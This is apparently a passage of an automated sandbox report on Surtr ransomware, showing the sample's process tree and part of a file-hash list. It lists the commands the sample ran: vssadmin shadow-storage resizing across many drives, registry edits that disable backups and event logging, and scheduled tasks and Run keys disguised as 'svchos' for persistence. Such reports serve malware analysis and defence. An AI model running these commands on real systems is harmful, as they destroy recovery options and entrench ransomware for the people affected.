                                                                                                                                                      C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SURTR_README.hta" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.hta"
                                                                                                                                                      2⤵
                                                                                                                                                        PID:1456
                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                        "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=S:\ /on=S:\ /maxsize=unbounded
                                                                                                                                                        2⤵
                                                                                                                                                          PID:3136
                                                                                                                                                          • C:\Windows\system32\vssadmin.exe
                                                                                                                                                            vssadmin resize shadowstorage /for=S:\ /on=S:\ /maxsize=unbounded
                                                                                                                                                            3⤵
                                                                                                                                                            • Enumerates connected drives
                                                                                                                                                            • Interacts with shadow copies
                                                                                                                                                            PID:5396
                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                          "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=S:\ /on=S:\ /maxsize=401MB
                                                                                                                                                          2⤵
                                                                                                                                                            PID:4548
                                                                                                                                                            • C:\Windows\system32\vssadmin.exe
                                                                                                                                                              vssadmin resize shadowstorage /for=S:\ /on=S:\ /maxsize=401MB
                                                                                                                                                              3⤵
                                                                                                                                                              • Enumerates connected drives
                                                                                                                                                              • Interacts with shadow copies
                                                                                                                                                              PID:5924
                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                            "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f
                                                                                                                                                            2⤵
                                                                                                                                                              PID:1636
                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f
                                                                                                                                                                3⤵
                                                                                                                                                                  PID:5520
                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f
                                                                                                                                                                2⤵
                                                                                                                                                                  PID:388
                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f
                                                                                                                                                                    3⤵
                                                                                                                                                                      PID:6048
                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=T:\ /on=T:\ /maxsize=401MB
                                                                                                                                                                    2⤵
                                                                                                                                                                      PID:3496
                                                                                                                                                                      • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                        vssadmin resize shadowstorage /for=T:\ /on=T:\ /maxsize=401MB
                                                                                                                                                                        3⤵
                                                                                                                                                                        • Interacts with shadow copies
                                                                                                                                                                        PID:4436
                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=Q:\ /on=Q:\ /maxsize=401MB
                                                                                                                                                                      2⤵
                                                                                                                                                                        PID:376
                                                                                                                                                                        • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                          vssadmin resize shadowstorage /for=Q:\ /on=Q:\ /maxsize=401MB
                                                                                                                                                                          3⤵
                                                                                                                                                                          • Interacts with shadow copies
                                                                                                                                                                          PID:4404
                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f
                                                                                                                                                                        2⤵
                                                                                                                                                                          PID:4912
                                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                                            reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f
                                                                                                                                                                            3⤵
                                                                                                                                                                              PID:6120
                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=P:\ /on=P:\ /maxsize=unbounded
                                                                                                                                                                            2⤵
                                                                                                                                                                              PID:1432
                                                                                                                                                                              • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                vssadmin resize shadowstorage /for=P:\ /on=P:\ /maxsize=unbounded
                                                                                                                                                                                3⤵
                                                                                                                                                                                • Enumerates connected drives
                                                                                                                                                                                • Interacts with shadow copies
                                                                                                                                                                                PID:5760
                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=P:\ /on=P:\ /maxsize=401MB
                                                                                                                                                                              2⤵
                                                                                                                                                                                PID:3360
                                                                                                                                                                                • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                  vssadmin resize shadowstorage /for=P:\ /on=P:\ /maxsize=401MB
                                                                                                                                                                                  3⤵
                                                                                                                                                                                  • Interacts with shadow copies
                                                                                                                                                                                  PID:5720
                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f
                                                                                                                                                                                2⤵
                                                                                                                                                                                  PID:2424
                                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                                    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f
                                                                                                                                                                                    3⤵
                                                                                                                                                                                      PID:5984
                                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=T:\ /on=T:\ /maxsize=unbounded
                                                                                                                                                                                    2⤵
                                                                                                                                                                                      PID:3752
                                                                                                                                                                                      • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                        vssadmin resize shadowstorage /for=T:\ /on=T:\ /maxsize=unbounded
                                                                                                                                                                                        3⤵
                                                                                                                                                                                        • Enumerates connected drives
                                                                                                                                                                                        • Interacts with shadow copies
                                                                                                                                                                                        PID:5864
                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f
                                                                                                                                                                                      2⤵
                                                                                                                                                                                        PID:3772
                                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                                          reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f
                                                                                                                                                                                          3⤵
                                                                                                                                                                                            PID:6004
                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=O:\ /on=O:\ /maxsize=unbounded
                                                                                                                                                                                          2⤵
                                                                                                                                                                                            PID:2064
                                                                                                                                                                                            • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                              vssadmin resize shadowstorage /for=O:\ /on=O:\ /maxsize=unbounded
                                                                                                                                                                                              3⤵
                                                                                                                                                                                              • Enumerates connected drives
                                                                                                                                                                                              • Interacts with shadow copies
                                                                                                                                                                                              PID:5976
                                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f
                                                                                                                                                                                            2⤵
                                                                                                                                                                                              PID:2128
                                                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                                                reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                  PID:5752
                                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=O:\ /on=O:\ /maxsize=401MB
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                  PID:1208
                                                                                                                                                                                                  • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                                    vssadmin resize shadowstorage /for=O:\ /on=O:\ /maxsize=401MB
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                    • Interacts with shadow copies
                                                                                                                                                                                                    PID:5960
                                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=V:\ /on=V:\ /maxsize=401MB
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                    PID:3292
                                                                                                                                                                                                    • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                                      vssadmin resize shadowstorage /for=V:\ /on=V:\ /maxsize=401MB
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                      • Enumerates connected drives
                                                                                                                                                                                                      • Interacts with shadow copies
                                                                                                                                                                                                      PID:5152
                                                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=W:\ /on=W:\ /maxsize=401MB
                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                      PID:1452
                                                                                                                                                                                                      • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                                        vssadmin resize shadowstorage /for=W:\ /on=W:\ /maxsize=401MB
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                        • Interacts with shadow copies
                                                                                                                                                                                                        PID:404
                                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=W:\ /on=W:\ /maxsize=unbounded
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                        PID:1040
                                                                                                                                                                                                        • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                                          vssadmin resize shadowstorage /for=W:\ /on=W:\ /maxsize=unbounded
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                          • Interacts with shadow copies
                                                                                                                                                                                                          PID:5572
                                                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=V:\ /on=V:\ /maxsize=unbounded
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                          PID:1524
                                                                                                                                                                                                          • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                                            vssadmin resize shadowstorage /for=V:\ /on=V:\ /maxsize=unbounded
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                            • Enumerates connected drives
                                                                                                                                                                                                            • Interacts with shadow copies
                                                                                                                                                                                                            PID:5952
                                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=U:\ /on=U:\ /maxsize=unbounded
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                            PID:652
                                                                                                                                                                                                            • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                                              vssadmin resize shadowstorage /for=U:\ /on=U:\ /maxsize=unbounded
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                              • Interacts with shadow copies
                                                                                                                                                                                                              PID:5804
                                                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=U:\ /on=U:\ /maxsize=401MB
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                              PID:2352
                                                                                                                                                                                                              • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                                                vssadmin resize shadowstorage /for=U:\ /on=U:\ /maxsize=401MB
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                • Interacts with shadow copies
                                                                                                                                                                                                                PID:4068
                                                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=X:\ /on=X:\ /maxsize=401MB
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                PID:3388
                                                                                                                                                                                                                • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                                                  vssadmin resize shadowstorage /for=X:\ /on=X:\ /maxsize=401MB
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                  • Interacts with shadow copies
                                                                                                                                                                                                                  PID:5968
                                                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=X:\ /on=X:\ /maxsize=unbounded
                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                • Enumerates connected drives
                                                                                                                                                                                                                PID:4444
                                                                                                                                                                                                                • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                                                  vssadmin resize shadowstorage /for=X:\ /on=X:\ /maxsize=unbounded
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                  • Interacts with shadow copies
                                                                                                                                                                                                                  PID:5796
                                                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=Y:\ /on=Y:\ /maxsize=401MB
                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                  PID:4472
                                                                                                                                                                                                                  • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                                                    vssadmin resize shadowstorage /for=Y:\ /on=Y:\ /maxsize=401MB
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                    • Enumerates connected drives
                                                                                                                                                                                                                    • Interacts with shadow copies
                                                                                                                                                                                                                    PID:2928
                                                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=Z:\ /on=Z:\ /maxsize=unbounded
                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                    PID:5188
                                                                                                                                                                                                                    • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                                                      vssadmin resize shadowstorage /for=Z:\ /on=Z:\ /maxsize=unbounded
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                      • Enumerates connected drives
                                                                                                                                                                                                                      • Interacts with shadow copies
                                                                                                                                                                                                                      PID:4624
                                                                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=A:\ /on=A:\ /maxsize=401MB
                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                      PID:5328
                                                                                                                                                                                                                      • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                                                        vssadmin resize shadowstorage /for=A:\ /on=A:\ /maxsize=401MB
                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                        • Interacts with shadow copies
                                                                                                                                                                                                                        PID:5448
                                                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=B:\ /on=B:\ /maxsize=401MB
                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                        PID:5416
                                                                                                                                                                                                                        • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                                                          vssadmin resize shadowstorage /for=B:\ /on=B:\ /maxsize=401MB
                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                          • Interacts with shadow copies
                                                                                                                                                                                                                          PID:6132
                                                                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=B:\ /on=B:\ /maxsize=unbounded
                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                          PID:5580
                                                                                                                                                                                                                          • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                                                            vssadmin resize shadowstorage /for=B:\ /on=B:\ /maxsize=unbounded
                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                            • Interacts with shadow copies
                                                                                                                                                                                                                            PID:312
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SURTR_README.txt" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.txt"
                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                            PID:5364
                                                                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=A:\ /on=A:\ /maxsize=unbounded
                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                              PID:5348
                                                                                                                                                                                                                              • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                                                                vssadmin resize shadowstorage /for=A:\ /on=A:\ /maxsize=unbounded
                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                • Interacts with shadow copies
                                                                                                                                                                                                                                PID:5836
                                                                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=Z:\ /on=Z:\ /maxsize=401MB
                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                PID:4800
                                                                                                                                                                                                                                • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                                                                  vssadmin resize shadowstorage /for=Z:\ /on=Z:\ /maxsize=401MB
                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                  • Interacts with shadow copies
                                                                                                                                                                                                                                  PID:5144
                                                                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=Y:\ /on=Y:\ /maxsize=unbounded
                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                  PID:4972
                                                                                                                                                                                                                                  • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                                                                    vssadmin resize shadowstorage /for=Y:\ /on=Y:\ /maxsize=unbounded
                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                    • Enumerates connected drives
                                                                                                                                                                                                                                    • Interacts with shadow copies
                                                                                                                                                                                                                                    PID:5704
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\Surtr.exe" "%TEMP%\Service\Surtr.exe"
                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                    PID:5800
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\PublicData_g463r2utzh5cgl.surt" "%TEMP%\Service\PublicData_g463r2utzh5cgl.surt"
                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                      PID:3024
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\PrivateData_g463r2utzh5cgl.surt" "%TEMP%\Service\PrivateData_g463r2utzh5cgl.surt"
                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                        PID:5944
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\ID_DATA.surt" "%TEMP%\Service\ID_DATA.surt"
                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                          PID:5644
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\SURTR_README.hta" "%TEMP%\Service\SURTR_README.hta"
                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                            PID:800
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\SURTR_README.txt" "%TEMP%\Service\SURTR_README.txt"
                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                              PID:1312
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c attrib +R /S "C:\ProgramData\Service"
                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                PID:6032
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                  attrib +R /S "C:\ProgramData\Service"
                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                  • Views/modifies file attributes
                                                                                                                                                                                                                                                  PID:5956
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c attrib +R /S "%TEMP%\Service"
                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                  PID:5988
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN svchos1 /TR "C:\ProgramData\Service\Surtr.exe" /RU SYSTEM /RL HIGHEST /F
                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                    PID:5852
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                      schtasks /CREATE /SC ONLOGON /TN svchos1 /TR "C:\ProgramData\Service\Surtr.exe" /RU SYSTEM /RL HIGHEST /F
                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                                                                                                      PID:3504
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN svchos2 /TR "C:\ProgramData\Service\Surtr.exe" /F
                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                      PID:5112
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                        schtasks /CREATE /SC ONLOGON /TN svchos2 /TR "C:\ProgramData\Service\Surtr.exe" /F
                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                                                                                                                        PID:2420
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\Surtr.exe" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe"
                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                      • Drops startup file
                                                                                                                                                                                                                                                      PID:2972
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos1" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                        PID:4436
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                          reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos1" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                          • Adds Run key to start application
                                                                                                                                                                                                                                                          PID:4100
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos2" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                          PID:5016
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                            reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos2" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                            • Adds Run key to start application
                                                                                                                                                                                                                                                            PID:2372
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos3" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                            PID:5392
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                              reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos3" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                              • Adds Run key to start application
                                                                                                                                                                                                                                                              PID:4648
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos4" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                              PID:1408
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos4" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                • Adds Run key to start application
                                                                                                                                                                                                                                                                PID:3536
                                                                                                                                                                                                                                                          • C:\Windows\system32\vssvc.exe
                                                                                                                                                                                                                                                            C:\Windows\system32\vssvc.exe
                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                            PID:5096
                                                                                                                                                                                                                                                          • C:\Windows\system32\wbengine.exe
                                                                                                                                                                                                                                                            "C:\Windows\system32\wbengine.exe"
                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                            PID:3188
                                                                                                                                                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                            • Enumerates connected drives
                                                                                                                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                            PID:1520
                                                                                                                                                                                                                                                          • C:\Windows\System32\vdsldr.exe
                                                                                                                                                                                                                                                            C:\Windows\System32\vdsldr.exe -Embedding
                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                              PID:4608
                                                                                                                                                                                                                                                            • C:\Windows\System32\vds.exe
                                                                                                                                                                                                                                                              C:\Windows\System32\vds.exe
                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                              • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                              PID:2328
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                              attrib +R /S "C:\Users\Admin\AppData\Local\Temp\Service"
                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                              • Views/modifies file attributes
                                                                                                                                                                                                                                                              PID:2020
                                                                                                                                                                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                              • Enumerates connected drives
                                                                                                                                                                                                                                                              PID:5572

                                                                                                                                                                                                                                                            Network

                                                                                                                                                                                                                                                            MITRE ATT&CK Enterprise v6

                                                                                                                                                                                                                                                            Replay Monitor

                                                                                                                                                                                                                                                            Loading Replay Monitor...

                                                                                                                                                                                                                                                            Downloads

                                                                                                                                                                                                                                                            • C:\ProgramData\Service\ID_DATA.surt

                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                              14B

                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                              b8cdf40ca5f06068c20a836c3fdd3bce

                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                              3b476c7d2d23518046ba421a905fe308e0426c03

                                                                                                                                                                                                                                                              SHA256

